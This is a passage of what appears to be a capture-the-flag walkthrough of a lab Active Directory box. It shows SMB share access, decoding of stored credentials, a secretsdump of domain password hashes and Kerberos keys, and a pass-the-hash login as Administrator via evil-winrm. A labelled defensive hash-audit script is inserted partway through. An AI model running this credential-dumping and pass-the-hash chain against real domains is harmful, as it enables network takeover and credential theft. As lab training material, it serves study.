Enter WORKGROUP\svc-admin's password: 
tree connect failed: NT_STATUS_BAD_NETWORK_NAME

┌──(kali㉿kali)-[~/tmp]
└─$ smbclient \\\\10.10.204.111\\backup -U svc-admin
Enter WORKGROUP\svc-admin's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

		8247551 blocks of size 4096. 3548545 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[~/tmp]
└─$ cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
┌──(kali㉿kali)-[~/tmp]
└─$ echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 --decode
backup@spookysec.local:backup2517860

Elevating Privileges

We’re told to use secretsdump.py from Impacket to get password hashes using the credentials we found. Cool. (I hate these tutorial boxes, I’m never doing one again; I enjoy the exploration… this feels like cheating…)

Anyway…

$ secretsdump.py backup:backup2517860@spookysec.local
Impacket v0.9.23.dev1+20210302.130123.df00d15c - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:e3d0f4e53b0fce2073a2ef33f2d075ca:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:6107bedbb5baabcc22813b5ffb187ca01abd47c01700016ec2b843a4c3994b54
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:cd0c0da9ee828cd342853de2a209d2f4
ATTACKTIVEDIREC$:des-cbc-md5:9426b6febf6dc2ab
[*] Cleaning up... 
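The `domain\uid:rid:lmhash:nthash` lines above are the part of that dump a defender actually reviews. As an added example (not from the post or from Impacket), here is a small parser for those lines that flags empty passwords, LM hashes still being stored, and accounts sharing an NT hash; the line regex is my assumption of the format as shown, and the sample input is a constructed subset of the dump above:

```python
import re
from collections import defaultdict
# Well-known values: LM hash of an empty password (LM storage disabled) and NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One NTDS line from secretsdump: [domain\]user:rid:lmhash:nthash:::  (Kerberos key lines do not match)
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)
# Constructed sample input: a subset of the dump shown above plus one Kerberos-key line as noise.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
spookysec.local\\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
"""

def parse_dump(text):
    """Return (user, rid, lmhash, nthash) for every NTDS hash line; other lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((m["user"], int(m["rid"]), m["lm"], m["nt"]))
    return rows

def find_reuse(rows):
    """Map each NT hash held by more than one account to the sorted list of those accounts."""
    by_hash = defaultdict(list)
    for user, _rid, _lm, nt in rows:
        by_hash[nt].append(user)
    return {nt: sorted(users) for nt, users in by_hash.items() if len(users) > 1}

def findings(text):
    """Findings a reviewer would raise: empty passwords, LM hashes still stored, NT hash reuse."""
    rows = parse_dump(text)
    out = []
    for user, rid, lm, nt in rows:
        if nt == EMPTY_NT:
            out.append(f"{user} (RID {rid}): empty password")
        if lm != EMPTY_LM:
            out.append(f"{user} (RID {rid}): LM hash still stored")
    for nt, users in find_reuse(rows).items():
        out.append(f"NT hash {nt[:8]}... shared by {', '.join(users)}")
    return out
```

On the sample it reports the Guest empty password and two shared NT hashes, one of them the Administrator hash also held by a-spooks.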

Looting

└─$ evil-winrm -u Administrator -i 10.10.204.111 -H 0e0363213e37b94221497260b0bcb4fc

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  11:39 AM             32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
********
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ..\..\backup\Desktop
*Evil-WinRM* PS C:\Users\backup\Desktop> dir


    Directory: C:\Users\backup\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:19 PM             26 PrivEsc.txt


*Evil-WinRM* PS C:\Users\backup\Desktop> type PrivEsc.txt
******

*Evil-WinRM* PS C:\Users\svc-admin\Desktop> dir


    Directory: C:\Users\svc-admin\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:18 PM             28 user.txt.txt


*Evil-WinRM* PS C:\Users\svc-admin\Desktop> type user.txt.txt
******

GGWP!
